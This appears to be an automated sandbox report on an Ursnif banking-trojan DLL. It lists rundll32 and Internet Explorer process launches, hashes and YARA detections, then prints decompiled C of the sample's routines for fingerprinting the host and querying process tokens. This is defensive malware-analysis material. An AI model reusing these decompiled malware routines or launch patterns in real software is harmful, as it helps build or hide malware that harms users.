                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.487540264.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.298330099.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.298892521.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.298800751.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Start time:10:55:37
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311524136.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311353638.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.488281426.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311162481.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310218293.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310401449.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310585045.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310811687.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311655737.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Start time:10:55:37
                                                        Start date:27/07/2021
                                                        Path:C:\Program Files\internet explorer\iexplore.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                        Imagebase:0x7ff6f8980000
                                                        File size:823560 bytes
                                                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:10:55:38
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Opisthotonos
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:10:55:38
                                                        Start date:27/07/2021
                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17410 /prefetch:2
                                                        Imagebase:0xdb0000
                                                        File size:822536 bytes
                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:55:41
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Hydrazo
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:55:45
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Overlock
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:55:49
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Automobilist
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:55:54
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Swampland
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:55:58
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Subarachnoid
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:56:02
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Bechained
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:56:07
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Unforeseenness
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:56:11
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Incrimination
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:56:12
                                                        Start date:27/07/2021
                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82950 /prefetch:2
                                                        Imagebase:0xdb0000
                                                        File size:822536 bytes
                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:56:17
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Oversystematic
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:56:18
                                                        Start date:27/07/2021
                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17432 /prefetch:2
                                                        Imagebase:0xdb0000
                                                        File size:822536 bytes
                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:56:21
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Shieldless
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.378625315.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.379329065.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.377754049.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.379402147.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.378397913.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.377966823.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.379198024.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000002.457353583.0000000007038000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.379544002.0000000007038000.00000004.00000040.sdmp, Author: Joe Security

                                                        General

                                                        Start time:10:56:26
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Tsarevitch
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353519210.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353381101.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353640605.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353482543.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353420356.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353660162.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353285218.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000002.442237673.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.353559736.0000000004AF8000.00000004.00000040.sdmp, Author: Joe Security

                                                        General

                                                        Start time:10:56:31
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Torchbearer
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349169873.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349379368.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349425307.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349209886.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349342259.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349245069.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349275169.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.349118555.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.401300061.00000000069B8000.00000004.00000040.sdmp, Author: Joe Security

                                                        General

                                                        Start time:10:56:34
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Moler
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:10:56:38
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\direction.dll,Hyperpigmented
                                                        Imagebase:0x3d0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.377493351.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.377965158.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.425611899.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.376670409.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.377140325.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.377030195.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.376078643.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.377890073.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.376494826.0000000004DD8000.00000004.00000040.sdmp, Author: Joe Security

                                                        Disassembly

                                                        Code Analysis

                                                          Executed Functions

                                                          C-Code - Quality: 96%
                                                          			E005E9135(char __eax, void* __esi) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v28;
                                                          				long _t34;
                                                          				signed int _t39;
                                                          				long _t50;
                                                          				char _t59;
                                                          				intOrPtr _t61;
                                                          				void* _t62;
                                                          				void* _t64;
                                                          				char _t65;
                                                          				intOrPtr* _t67;
                                                          				void* _t68;
                                                          				void* _t69;
                                                          
                                                          				_t69 = __esi;
                                                          				_t65 = __eax;
                                                          				_v8 = 0;
                                                          				_v12 = __eax;
                                                          				if(__eax == 0) {
                                                          					_t59 =  *0x5ed270; // 0xd448b889
                                                          					_v12 = _t59;
                                                          				}
                                                          				_t64 = _t69;
                                                          				E005EA6CC( &_v12, _t64);
                                                          				if(_t65 != 0) {
                                                          					 *_t69 =  *_t69 ^  *0x5ed2a4 ^ 0x4c0ca0ae;
                                                          				} else {
                                                          					GetUserNameW(0,  &_v8); // executed
                                                          					_t50 = _v8;
                                                          					if(_t50 != 0) {
                                                          						_t62 = RtlAllocateHeap( *0x5ed238, 0, _t50 + _t50);
                                                          						if(_t62 != 0) {
                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                          								_t64 = _t62;
                                                          								 *_t69 =  *_t69 ^ E005E7306(_v8 + _v8, _t64);
                                                          							}
                                                          							HeapFree( *0x5ed238, 0, _t62);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t61 = __imp__;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				GetComputerNameW(0,  &_v8);
                                                          				_t34 = _v8;
                                                          				if(_t34 != 0) {
                                                          					_t68 = RtlAllocateHeap( *0x5ed238, 0, _t34 + _t34);
                                                          					if(_t68 != 0) {
                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                          							_t64 = _t68;
                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E005E7306(_v8 + _v8, _t64);
                                                          						}
                                                          						HeapFree( *0x5ed238, 0, _t68);
                                                          					}
                                                          				}
                                                          				asm("cpuid");
                                                          				_t67 =  &_v28;
                                                          				 *_t67 = 1;
                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                          				 *(_t67 + 0xc) = _t64;
                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                          				return _t39;
                                                          			}



















                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 005E916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 005E9183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 005E9190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,005E5D20), ref: 005E91B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 005E91D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 005E91EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 005E91F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,005E5D20), ref: 005E9217
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID: ]^
                                                          • API String ID: 3239747167-1154138136
                                                          • Opcode ID: 5d2cdba24b3f335cd0d909c1ad67e80bcaf62832587f975bc63d70897dc8d602
                                                          • Instruction ID: b58d9a3fa9fa93d567faf78a61c82439650aba7ece0983688ee0a2ba64e61c83
                                                          • Opcode Fuzzy Hash: 5d2cdba24b3f335cd0d909c1ad67e80bcaf62832587f975bc63d70897dc8d602
                                                          • Instruction Fuzzy Hash: 64311C71A00246EFDB18DF65DCC5AAEBBF9FB58300F114465E585DB220D730EE05AB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 79%
                                                          			E10001456(char _a4) {
                                                          				long _v8;
                                                          				struct _SYSTEMTIME _v24;
                                                          				char _v48;
                                                          				void* __edi;
                                                          				long _t20;
                                                          				int _t22;
                                                          				long _t25;
                                                          				long _t26;
                                                          				long _t30;
                                                          				void* _t36;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t43;
                                                          				signed int _t44;
                                                          				void* _t48;
                                                          				signed int _t51;
                                                          				void* _t54;
                                                          				intOrPtr* _t55;
                                                          
                                                          				_t20 = E10001F0E();
                                                          				_v8 = _t20;
                                                          				if(_t20 != 0) {
                                                          					return _t20;
                                                          				}
                                                          				do {
                                                          					GetSystemTime( &_v24);
                                                          					_t22 = SwitchToThread();
                                                          					asm("cdq");
                                                          					_t44 = 9;
                                                          					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
                                                          					_t25 = E10001717(0, _t51); // executed
                                                          					_v8 = _t25;
                                                          					Sleep(_t51 << 5); // executed
                                                          					_t26 = _v8;
                                                          				} while (_t26 == 0xc);
                                                          				if(_t26 != 0) {
                                                          					L18:
                                                          					return _t26;
                                                          				}
                                                          				if(_a4 != 0) {
                                                          					L11:
                                                          					_push(0);
                                                          					_t54 = E1000155C(E10001E55,  &_v48);
                                                          					if(_t54 == 0) {
                                                          						_v8 = GetLastError();
                                                          					} else {
                                                          						_t30 = WaitForSingleObject(_t54, 0xffffffff);
                                                          						_v8 = _t30;
                                                          						if(_t30 == 0) {
                                                          							GetExitCodeThread(_t54,  &_v8);
                                                          						}
                                                          						CloseHandle(_t54);
                                                          					}
                                                          					_t26 = _v8;
                                                          					if(_t26 == 0xffffffff) {
                                                          						_t26 = GetLastError();
                                                          					}
                                                          					goto L18;
                                                          				}
                                                          				if(E10001F87(_t44,  &_a4) != 0) {
                                                          					 *0x10004138 = 0;
                                                          					goto L11;
                                                          				}
                                                          				_t43 = _a4;
                                                          				_t55 = __imp__GetLongPathNameW;
                                                          				_t36 =  *_t55(_t43, 0, 0); // executed
                                                          				_t48 = _t36;
                                                          				if(_t48 == 0) {
                                                          					L9:
                                                          					 *0x10004138 = _t43;
                                                          					goto L11;
                                                          				}
                                                          				_t14 = _t48 + 2; // 0x2
                                                          				_t38 = E10002009(_t48 + _t14);
                                                          				 *0x10004138 = _t38;
                                                          				if(_t38 == 0) {
                                                          					goto L9;
                                                          				}
                                                          				 *_t55(_t43, _t38, _t48); // executed
                                                          				E1000201E(_t43);
                                                          				goto L11;
                                                          			}





















                                                          APIs
                                                            • Part of subcall function 10001F0E: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,10001462,74B063F0), ref: 10001F1D
                                                            • Part of subcall function 10001F0E: GetVersion.KERNEL32 ref: 10001F2C
                                                            • Part of subcall function 10001F0E: GetCurrentProcessId.KERNEL32 ref: 10001F48
                                                            • Part of subcall function 10001F0E: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F61
                                                          • GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 10001474
                                                          • SwitchToThread.KERNEL32 ref: 1000147A
                                                            • Part of subcall function 10001717: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 1000176D
                                                            • Part of subcall function 10001717: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 10001833
                                                          • Sleep.KERNELBASE(00000000,00000000), ref: 1000149B
                                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100014D0
                                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100014EE
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 10001526
                                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 10001538
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000153F
                                                          • GetLastError.KERNEL32(?,00000000), ref: 10001547
                                                          • GetLastError.KERNEL32 ref: 10001554
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
                                                          • String ID:
                                                          • API String ID: 1962885430-0
                                                          • Opcode ID: 86f2e835d60dbcb1ec91d1cce4192dfe94e3a80051a1e2ef8fba96cdcbc9dbfd
                                                          • Instruction ID: 65dbc16d9a0349db468ca3b41a6515201db422734640c18706fad21f2de96105
                                                          • Opcode Fuzzy Hash: 86f2e835d60dbcb1ec91d1cce4192dfe94e3a80051a1e2ef8fba96cdcbc9dbfd
                                                          • Instruction Fuzzy Hash: 6431C275801A25EBF712EBA48C849DF77FCDF883E2B214122F901D7148EB30DA408BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E005E5A27(char _a4, void* _a8) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v40;
                                                          				void* _v44;
                                                          				void** _t33;
                                                          				void* _t40;
                                                          				void* _t43;
                                                          				void** _t44;
                                                          				intOrPtr* _t47;
                                                          				char _t48;
                                                          
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v20 = _a4;
                                                          				_t48 = 0;
                                                          				_v16 = 0;
                                                          				_a4 = 0;
                                                          				_v44 = 0x18;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v36 = 0;
                                                          				_v28 = 0;
                                                          				_v24 = 0;
                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                          					_t33 =  &_v8;
                                                          					__imp__(_v12, 8, _t33);
                                                          					if(_t33 >= 0) {
                                                          						_t47 = __imp__;
                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                          						_t44 = E005EA71F(_a4);
                                                          						if(_t44 != 0) {
                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                          							if(_t40 >= 0) {
                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                          								_t48 = 1;
                                                          							}
                                                          							E005EA734(_t44);
                                                          						}
                                                          						NtClose(_v8); // executed
                                                          					}
                                                          					NtClose(_v12);
                                                          				}
                                                          				return _t48;
                                                          			}




















                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 005E5A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 005E5A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 005E5A9D
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 005E5ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 005E5AC7
                                                          • NtClose.NTDLL(?), ref: 005E5AD9
                                                          • NtClose.NTDLL(00000000), ref: 005E5AE3
